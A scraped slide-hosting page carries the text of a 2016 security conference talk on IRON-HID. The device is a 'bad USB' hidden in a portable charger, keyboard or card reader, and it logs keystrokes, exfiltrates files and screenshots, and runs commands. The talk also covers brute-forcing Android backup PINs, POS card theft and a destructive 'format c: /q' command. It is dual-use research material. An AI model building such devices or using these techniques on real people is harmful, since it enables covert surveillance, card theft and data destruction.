AVR HOW-TO GUIDE Interfacing SPI-Ethernet With AVR Slicker Contents At A Glance
 
Arduino camera interfacing OV7670
Arduino camera interfacing OV7670Arduino camera interfacing OV7670
Arduino camera interfacing OV7670
 
ELECTRONIC AND - Copy (1)
ELECTRONIC AND - Copy (1)ELECTRONIC AND - Copy (1)
ELECTRONIC AND - Copy (1)
 
DEFCON-21-Koscher-Butler-The-Secret-Life-of-SIM-Cards-Updated.pdf
DEFCON-21-Koscher-Butler-The-Secret-Life-of-SIM-Cards-Updated.pdfDEFCON-21-Koscher-Butler-The-Secret-Life-of-SIM-Cards-Updated.pdf
DEFCON-21-Koscher-Butler-The-Secret-Life-of-SIM-Cards-Updated.pdf
 
FPGA_prototyping proccesing with conclusion
FPGA_prototyping proccesing with conclusionFPGA_prototyping proccesing with conclusion
FPGA_prototyping proccesing with conclusion
 
Connected Cars - Poster Child for the IoT Reality Check
Connected Cars - Poster Child for the IoT Reality CheckConnected Cars - Poster Child for the IoT Reality Check
Connected Cars - Poster Child for the IoT Reality Check
 

Recently uploaded

Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
A Sighting of filterA in Typelevel Rite of Passage
A Sighting of filterA in Typelevel Rite of PassageA Sighting of filterA in Typelevel Rite of Passage
A Sighting of filterA in Typelevel Rite of Passage
Philip Schwarz
 
Vitthal Shirke Java Microservices Resume.pdf
Vitthal Shirke Java Microservices Resume.pdfVitthal Shirke Java Microservices Resume.pdf
Vitthal Shirke Java Microservices Resume.pdf
Vitthal Shirke
 
First Steps with Globus Compute Multi-User Endpoints
First Steps with Globus Compute Multi-User EndpointsFirst Steps with Globus Compute Multi-User Endpoints
First Steps with Globus Compute Multi-User Endpoints
Globus
 
Utilocate provides Smarter, Better, Faster, Safer Locate Ticket Management
Utilocate provides Smarter, Better, Faster, Safer Locate Ticket ManagementUtilocate provides Smarter, Better, Faster, Safer Locate Ticket Management
Utilocate provides Smarter, Better, Faster, Safer Locate Ticket Management
Utilocate
 
Globus Connect Server Deep Dive - GlobusWorld 2024
Globus Connect Server Deep Dive - GlobusWorld 2024Globus Connect Server Deep Dive - GlobusWorld 2024
Globus Connect Server Deep Dive - GlobusWorld 2024
Globus
 
Cracking the code review at SpringIO 2024
Cracking the code review at SpringIO 2024Cracking the code review at SpringIO 2024
Cracking the code review at SpringIO 2024
Paco van Beckhoven
 
APIs for Browser Automation (MoT Meetup 2024)
APIs for Browser Automation (MoT Meetup 2024)APIs for Browser Automation (MoT Meetup 2024)
APIs for Browser Automation (MoT Meetup 2024)
Boni García
 
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
AI Pilot Review: The World’s First Virtual Assistant Marketing SuiteAI Pilot Review: The World’s First Virtual Assistant Marketing Suite
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
Google
 
Enhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdfEnhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdf
Globus
 
Quarkus Hidden and Forbidden Extensions
Quarkus Hidden and Forbidden ExtensionsQuarkus Hidden and Forbidden Extensions
Quarkus Hidden and Forbidden Extensions
Max Andersen
 
Text-Summarization-of-Breaking-News-Using-Fine-tuning-BART-Model.pptx
Text-Summarization-of-Breaking-News-Using-Fine-tuning-BART-Model.pptxText-Summarization-of-Breaking-News-Using-Fine-tuning-BART-Model.pptx
Text-Summarization-of-Breaking-News-Using-Fine-tuning-BART-Model.pptx
ShamsuddeenMuhammadA
 
Large Language Models and the End of Programming
Large Language Models and the End of ProgrammingLarge Language Models and the End of Programming
Large Language Models and the End of Programming
Matt Welsh
 
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
informapgpstrackings
 
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, BetterWebinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
XfilesPro
 
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdfDominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
AMB-Review
 
Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...
Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...
Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...
Globus
 
OpenFOAM solver for Helmholtz equation, helmholtzFoam / helmholtzBubbleFoam
OpenFOAM solver for Helmholtz equation, helmholtzFoam / helmholtzBubbleFoamOpenFOAM solver for Helmholtz equation, helmholtzFoam / helmholtzBubbleFoam
OpenFOAM solver for Helmholtz equation, helmholtzFoam / helmholtzBubbleFoam
takuyayamamoto1800
 
How Recreation Management Software Can Streamline Your Operations.pptx
How Recreation Management Software Can Streamline Your Operations.pptxHow Recreation Management Software Can Streamline Your Operations.pptx
How Recreation Management Software Can Streamline Your Operations.pptx
wottaspaceseo
 
Lecture 1 Introduction to games development
Lecture 1 Introduction to games developmentLecture 1 Introduction to games development
Lecture 1 Introduction to games development
abdulrafaychaudhry
 

Recently uploaded (20)

Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
A Sighting of filterA in Typelevel Rite of Passage
A Sighting of filterA in Typelevel Rite of PassageA Sighting of filterA in Typelevel Rite of Passage
A Sighting of filterA in Typelevel Rite of Passage
 
Vitthal Shirke Java Microservices Resume.pdf
Vitthal Shirke Java Microservices Resume.pdfVitthal Shirke Java Microservices Resume.pdf
Vitthal Shirke Java Microservices Resume.pdf
 
First Steps with Globus Compute Multi-User Endpoints
First Steps with Globus Compute Multi-User EndpointsFirst Steps with Globus Compute Multi-User Endpoints
First Steps with Globus Compute Multi-User Endpoints
 
Utilocate provides Smarter, Better, Faster, Safer Locate Ticket Management
Utilocate provides Smarter, Better, Faster, Safer Locate Ticket ManagementUtilocate provides Smarter, Better, Faster, Safer Locate Ticket Management
Utilocate provides Smarter, Better, Faster, Safer Locate Ticket Management
 
Globus Connect Server Deep Dive - GlobusWorld 2024
Globus Connect Server Deep Dive - GlobusWorld 2024Globus Connect Server Deep Dive - GlobusWorld 2024
Globus Connect Server Deep Dive - GlobusWorld 2024
 
Cracking the code review at SpringIO 2024
Cracking the code review at SpringIO 2024Cracking the code review at SpringIO 2024
Cracking the code review at SpringIO 2024
 
APIs for Browser Automation (MoT Meetup 2024)
APIs for Browser Automation (MoT Meetup 2024)APIs for Browser Automation (MoT Meetup 2024)
APIs for Browser Automation (MoT Meetup 2024)
 
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
AI Pilot Review: The World’s First Virtual Assistant Marketing SuiteAI Pilot Review: The World’s First Virtual Assistant Marketing Suite
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
 
Enhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdfEnhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdf
 
Quarkus Hidden and Forbidden Extensions
Quarkus Hidden and Forbidden ExtensionsQuarkus Hidden and Forbidden Extensions
Quarkus Hidden and Forbidden Extensions
 
Text-Summarization-of-Breaking-News-Using-Fine-tuning-BART-Model.pptx
Text-Summarization-of-Breaking-News-Using-Fine-tuning-BART-Model.pptxText-Summarization-of-Breaking-News-Using-Fine-tuning-BART-Model.pptx
Text-Summarization-of-Breaking-News-Using-Fine-tuning-BART-Model.pptx
 
Large Language Models and the End of Programming
Large Language Models and the End of ProgrammingLarge Language Models and the End of Programming
Large Language Models and the End of Programming
 
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
 
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, BetterWebinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
 
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdfDominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
 
Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...
Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...
Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...
 
OpenFOAM solver for Helmholtz equation, helmholtzFoam / helmholtzBubbleFoam
OpenFOAM solver for Helmholtz equation, helmholtzFoam / helmholtzBubbleFoamOpenFOAM solver for Helmholtz equation, helmholtzFoam / helmholtzBubbleFoam
OpenFOAM solver for Helmholtz equation, helmholtzFoam / helmholtzBubbleFoam
 
How Recreation Management Software Can Streamline Your Operations.pptx
How Recreation Management Software Can Streamline Your Operations.pptxHow Recreation Management Software Can Streamline Your Operations.pptx
How Recreation Management Software Can Streamline Your Operations.pptx
 
Lecture 1 Introduction to games development
Lecture 1 Introduction to games developmentLecture 1 Introduction to games development
Lecture 1 Introduction to games development
 

HITBSecConf 2016-Create Your Own Bad Usb

  • 1. IRON-HID: Create your own bad USB Seunghun Han
  • 2. Who am I ?  Security researcher at NSR (National Security Research Institute of South Korea)  Operating system and firmware developer  Author of the book series titled “64-bit multi- core OS principles and structure, Vol.1 & 2”  a.k.a kkamagui (crow or raven in English) - @kkamagui1
  • 3.  Background and Architecture of IRON-HID  Hacking a Portable Charger  Testing a Vulnerability of a Smartphones  Testing a Vulnerability of a POS System and a PC  Bonus Contents
  • 4.  Background and Architecture of IRON-HID  Hacking a Portable Charger  Testing a Vulnerability of the Smartphone  Testing a Vulnerability of the POS System and the PC  Bonus
  • 5. IRON-HID Human Interface Device for making your tools IRON-HID Project? =
  • 6. Features  Custom device + firmware + test agent program + Android smartphone program  Various types of system exploitable  POS (Point-of-Sale), PC, Android, etc.  Lightweight embedded hardware-based  “Arduino” and “Teensy”  Open-source project!  https://github.com/kkamagui/IRON-HID
  • 7. Arduino vs Teensy Arduino Teensy Arduino Mega Teensy++ 2.0 Larger (Palm size) Smaller (Paper-clip size) 256KB Flash (ATmega16U2 + ATmega2560) 128KB Flash (AT90USB1286) 60 I/O Pins 46 I/O Pins Arduino Sketch IDE is available!
  • 9. Target POS systems, PCs, smartphones Embedded hardware (Low-powered hardware) Wireless module (WiFi, Bluetooth, Cellular, etc.) Receive results of commands Receive status of a proxy device Execute shell commands Send keyboard events Capture screens Get files Send commands and events Install a test agent program Receive results of commands (Results of shell, screens, files) Test agent (TA) program IRON-HID firmware (USB functions and a CD-ROM image) Custom device (in proxy devices) : IRON-HID component Security inspector’ smartphone IRON-HID commander program
  • 10. IRON-HID Firmware  Emulates keyboard and mass-storage device  It has one interrupt type endpoint for sending and logging keyboard events  It has two bulk type endpoints for installing the TA program  Makes a custom communication channel  It has one control type endpoint for making a tunnel between the TA program and the Commander program
  • 11. TA program and IRON-HID Commander  TA program processes requests of Commander  Command Executions, Screen Captures, File Transfers  Commander is an interface of pen-testers  It has control tab, command tab, key tab  Penetration tester uses each tab for testing security holes
  • 12. Direction Format Description Commander  TA program C;<command>; Commander requests that TA program executes a command and sends result to Commander Commander  TA program G;<filename>; Commander requests that TA program sends a file to Commander Commander  TA program S;; Commander requests that TA program captures a screenshot and sends it to Commander TA program  Commander F;;<64byte data>; TA program sends results to Commander Commander  Firmware <Magic string 1> Commander changes firmware’s mode to command transfer mode Commander  Firmware <Magic string 2> Commander changes firmware’s mode to keyboard event mode Commander  Firmware <Magic string 3> Commander requests that firmware installs TA program into host Firmware  Commander M;;<keyboard event>; Firmware sends user’s keyboard inputs to Commander Firmware  Commander D;;<debug message>; Firmware sends debug messages to Commander
  • 13. We are ready to launch! Choose a target to attachit
  • 14. We want a portable charger  We use the smartphone everywhere!!  We spend much time with the smartphone  But, it doesn’t have enough battery  So, you should bring your charger or …
  • 15. So many portable chargers…
  • 16. So many battery rental services…
  • 17. Hey, You totally believe your portable charger?
  • 18. PowerShock!!  It is a portable charger, but not normal  It has IRON-HID inside it  It can test Android smartphones  It can test POS(Point-Of-Sale) Systems  It can test your PC It is a perfect weapon for penetration testers
  • 19.  Background and Architecture of IRON-HID  Hacking a Portable Charger  Testing a Vulnerability of the Smartphone  Testing a Vulnerability of the POS System and the PC  Bonus
  • 21. Inside of the portable charger  It has a very simple architecture  A charger module and battery cells  High capacity model  More battery cells!
  • 22. Cutting off battery cells  Make some space for IRON-HIDs  Battery cells are connected in parallel  Cut off the cell connector carefully
  • 23. Pin layouts of the charger module USB Connector for Input (recharging) USB Connector for Output (smartphone) VCC Data- Data+ GND VCC Data- Data+ GND ID (No.1)(No.5) (No.1)(No.4)
  • 24. USB Datasheet (VCC) (GND) (VCC) (GND) (VCC) (GND) Micro Type A Type Mini Type
  • 25. Pin layouts of the IRON-HID VCC GND TX RX CTS RTS Bluetooth Serial Module (RN-42 Silver) Teensy D2 (RX) D3 (TX) GND 5V OUT Bluetooth TX RX GND VCC VCC Data- Data+ GND IDTeensy
  • 26. You got the power!! * Rebirth of the Portable Charger *
  • 27.  It activates the USB host function of smart-phones  You can connect various types of USB peripherals such as a keyboard, a mass- storage (USB drive), a mouse USB OTG (On-The-Go) * The final piece of the puzzle *
  • 28. … ?! … Smartphone PowerShockCables
  • 29. … ?! … Smartphone PowerShockCables THIS IS NOT WHAT I WANT OH…
  • 30. Making a custom OTG cable Connect the ID pin with the GND pin
  • 31.  Background and Architecture of IRON-HID  Hacking a Portable Charger  Testing a Vulnerability of the Smartphone  Testing a Vulnerability of the POS System and the PC  Bonus
  • 32. Well-known Smartphone Vulnerability Do you use a pattern lock? Do you set a backup PIN? Can you type backup PINs unlimitedly? Yes Yes No No No Yes You are in danger You are safe (maybe…)
  • 33.  Connect PowerShock to a smartphone with the custom OTG cable and fire!!  It is really hard to test the vulnerability with your hands  The PowerShock tests it instead of you  It sends PINs quickly and automatically!! Testing the vulnerability If someone asks you to charge a phone, charge it with PowerShock!!
  • 35.  Background and Architecture of IRON-HID  Hacking a Portable Charger  Testing a Vulnerability of the Smartphone  Testing a Vulnerability of the POS System and the PC  Bonus
  • 36. Inside of the POS Systems Parallel Port USB + LAN Serial Port PS/2 Many POS systems are PC-based!! ==
  • 37. If the PowerShock plugs into the POS? If POS system has a vulnerability, you can grab card numbers!! Recharge Card Num: XXXX-XXXX Date: XX/XXPOS System PowerShock USB
  • 38. Demo (Let’s test the POS system)
  • 39.  Background and Architecture of IRON-HID  Hacking a Portable Charger  Testing a Vulnerability of the Smartphone  Testing a Vulnerability of the POS System and the PC  Bonus
  • 40. KeyboardShock Attach IRON-HID onto USB keyboards and give them to your colleagues
  • 41. Find the key matrix with multimeter
  • 42. The example of the keyboard matrix
  • 43. ReaderShock Attach IRON-HID onto card readers and give them also to your colleagues
  • 44. Then… You will be the big brother for fun!! Logging and sending keys Receiving files and capturing screenshots Executing commands C:> notepad no-mercy.txt C:> format c: /q
  • 45. Resources  http://www.fourwalledcubicle.com  http://cdemu.blogspot.com  http://www.usb.org  https://www.arduino.cc  https://www.pjrc.com/teensy
  • 46. I will be waiting for your email @kkamagui1, hanseunghun@nsr.re.kr Thank you !